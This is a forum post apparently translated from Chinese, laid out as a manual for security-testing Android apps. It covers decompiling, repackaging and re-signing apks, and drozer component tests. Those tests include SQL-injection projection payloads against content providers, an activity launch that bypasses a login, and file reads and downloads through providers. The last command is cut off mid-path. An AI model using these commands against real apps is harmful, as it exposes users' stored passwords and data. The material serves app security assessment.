Jump to content

Title: APP android test case manual

UKhackteam
UKhackteam
in Hacker Cracking / Penetration Testing / Cybersecurity

Featured Replies

Posted

1. Client program security test

1. Check the information of apk

java -jar GetApkInfo.jar tfkj.apk

1049983-20211217131228014-496545986.png

2. Digital signature check

C:\Program Files\Java\jdk1.8.0_111\bin\jarsigner.exe-verify C:\Users\bk\Desktop\Tianfu Technology Cloud APP\Tianfu Technology Cloud Service Platform\Tianfu Technology Cloud Service Platform.apk

1049983-20211217131228573-1991440786.png

C:\Program

Files\Java\jdk1.8.0_111\bin\jarsigner.exe-verify C:\Users\bk\Desktop\Tianfu Technology Cloud APP\Tianfu Technology Cloud Service Platform\Tianfu Technology Cloud Service Platform.apk -verbose -certs

1049983-20211217131229003-618681876.png

The developer's certificate is not standardized, resulting in unknown developer's identity information

keytool.exe-printcert-file.\CERT.RSA

1049983-20211217131229516-1178820240.png

3. Decompile check

View APP hardening types through ApkScan.jar

1049983-20211217131230011-966832256.png

Apk decompiled to Java source code :

Treat apk as zip and decompress to get the classes.dex file

1049983-20211217131230480-638869969.png

Copy the unzipped classes.dex file to the dex2jar tool folder

1049983-20211217131231153-1756958467.png

Execute the command: d2j-dex2jar classes.dex

1049983-20211217131231611-193919411.png

After execution, the decompiled classes-dex2jar.jar file is obtained.

1049983-20211217131232059-1991644145.png

Use jd-gui.exe or luyten-0.5.4 to open the classes-dex2jar.jar file to get the 360 security hardened obfuscated source code.

1049983-20211217131232556-603158649.png

Apk compiled to Smali language :

java -jar [apktool_2.3.4.jar] d -f

[apk address] -o [output directory]

java -jar

apktool_2.3.3.jar d [-s] -f C:\Users\bk\Desktop\Tianfu Technology Cloud APP\Tianfu Technology Cloud Service Platform.apk -otfkj //Insist like Taobao app cannot be decompiled, -s means only decompiling xml files

java -jar

apktool_2.3.3.jar d -f C:\Users\bk\Desktop\Tianfu Technology Cloud APP\Tianfu Technology Cloud Service Platform.apk -otfkj

1049983-20211217131233067-1296404841.png

or:

apktool.bat d Tianfu Technology Cloud Service Platform.apk

1049983-20211217131233565-431882397.png

4. Check AndroidManifest.xml file

java -jar AXMLPrinter2.jar AndroidManifest.xml

AndroidManifest.txt

or

java -jar APKParser.jar Tianfu Technology Cloud Service Platform.apk AndroidManifest.txt

1049983-20211217131234098-1085441528.png

1049983-20211217131234611-1809668187.png

1049983-20211217131235024-1950334509.png1. Turn on the application data to backup:

allowbackup backup permission, ture has the risk of backup data leakage (default is TRUE if not configured)

1049983-20211217131235528-1612938688.png

2. Turn on unsafe debug mode:

Debuggable attribute, true poses a risk of application information tampering and leaking (default is FALSE if not configured)

1049983-20211217131236182-153918030.png

5. Check for Janus vulnerability

(1) Janus vulnerability (Based on Janus vulnerability, an attacker can modify the APP without affecting its original signature. The tampered APP can be successfully installed and run. V1+V2 signatures should be used at the same time) 1049983-20211217131236672-941233265.png

6. Application integrity calibration inspection

Decompile the source code and modify the image file name as test.png

1049983-20211217131237240-1525542787.png

Regenerate the apk package, the command is as follows:

java -jar apktool.jar b -f folder to be packaged -o output apk path

1049983-20211217131237760-235511991.png

1049983-20211217131238381-1458875576.png

or

apktool.bat bTianfu Technology Cloud Service Platform

1049983-20211217131238824-1189614589.png

Under Tianfu Technology Cloud File, you can find 2 more folders :build and dist (the packaged APK file is stored in it)

Re-sign the APK command is as follows:

java -jar signapk.jar testkey.x509.pem

testkey.pk8 Apk file path to be signed. Apk path output after signature

1049983-20211217131239209-956788928.png

Then reinstall the apk, if it can be reinstalled, the file integrity will be corrupted

2. Component safety test

1. Basic information query (1), list the program installation package:

run app.package.list

1049983-20211217131239559-1086056965.png(2), get the package name of the app name drozer (the Chinese APP cannot be listed, you can use: java -jar GetApkInfo.jar to get the package name of the installed app)

Command: run app.package.list -f package name

run app.package.list -f drozer

1049983-20211217131239881-1290900397.png(3), view the attack surface of the four major components of Android: Command: run app.package.attacksurface Package name run app.package.attacksurface com.zhuoyigou.dese 1049983-20211217131240206-1382008858.png

2. Activity (Interface)Component Test

Usually displayed as a visual user interaction interface (1), view external activity component information command: run app.activity.info -a package name run app.activity.info -a com.zhuoyigou.dese 1049983-20211217131240587-1688237832.png (2), use app.activity.start for vulnerability testing

Command: run app.activity.start --component package name Component name run app.activity.start--componentcom.mwr.example.sievecom.mwr.example.sieve.PWList #Bypass the password and enter the system, generally the main login window interactive interface 1049983-20211217131240871-1618307265.png 1049983-20211217131241457-1425156837.png

Calling the exposed activity component (generally, the activity component will only expose one program startup interface, and when exposing the others, it is component exposure. The following is a test, and there are no component exposure vulnerabilities) 1049983-20211217131241829-500625496.png 1049983-20211217131242236-1588541504.jpg

3. Content provider component test

Mainly used to implement data sharing between different applications (1), check the content provider component information command: run app.provider.info -a package name run app.provider.info -a com.zhuoyigou.dese 1049983-20211217131242548-2114912260.png (2), ContentProviders Data leakage URL command: run scanner.provider.finduris -a package name run scanner.provider.finduris -a com.zhuoyigou.dese 1049983-20211217131242952-505976919.png (3), obtain data of each Uri

Command: run app.provider.query The URL address that can be leaked --verticalrun app.provider.query content://com.zhuoyigou.dese.ipc.provider/--vertical 1049983-20211217131243276-1703090917.png (3), ContentProviders SQL injection command 1: run app.provider.query The URL address that can be connected --projection ''

Command 2: run app.provider.query URL address that can be connected --selection '''run app.provider.query content://com.zhuoyigou.dese.ipc.provider/--selection ''' 1049983-20211217131243626-1469344691.png 1049983-20211217131243937-488153965.png An error indicates that there is SQL injection (4) and all tables are listed

Command: run app.provider.query URL address that can be connected --projection '* FROM SQLITE_MASTER WHERE type='table';--'run app.provider.query content://com.zhuoyigou.dese.ipc.provider/--projection '* FROM SQLITE_MASTER WHERE type='table';--'The following figure shows three tables android_metadata, Passwords, and Key. From the name, it can be judged that android_metadata is a system-related table, and the other two may be related to password and other data.

安卓四大组件审计实验(drozer)

(5) Get the data in a table (such as Key):

Command: run app.provider.query URL address that can be connected --projection '* FROM table name;--'run app.provider.query content://com.zhuoyigou.dese.ipc.provider/--projection '* FROM Key;--' (6), detect SQL injection

Command: run scanner.provider.injection -a package name

run scanner.provider.injection -a com.zhuoyigou.dese 1049983-20211217131244758-1741595285.png (7), detection directory traversal command: run scanner.provider.traversal -a package name run scanner.provider.traversal -a com.zhuoyigou.dese 1049983-20211217131245151-1456269698.png (8) Read system file command: run app.provider.read URL address that can be connected run app.provider.read content://com.zhuoyigou.dese.ipc.provider/1049983-20211217131245503-305825827.png (9), download system file to local command: run app.provider.download Available download file address Local absolute path

run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/datab

  • Quote

    • Join the conversation

    You can post now and register later. If you have an account, sign in now to post with your account.
    Note: Your post will require moderator approval before it will be visible.

    Guest
    Reply to this topic...
    Go to topic listing

    Important Information

    HackTeam Cookie PolicyWe have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.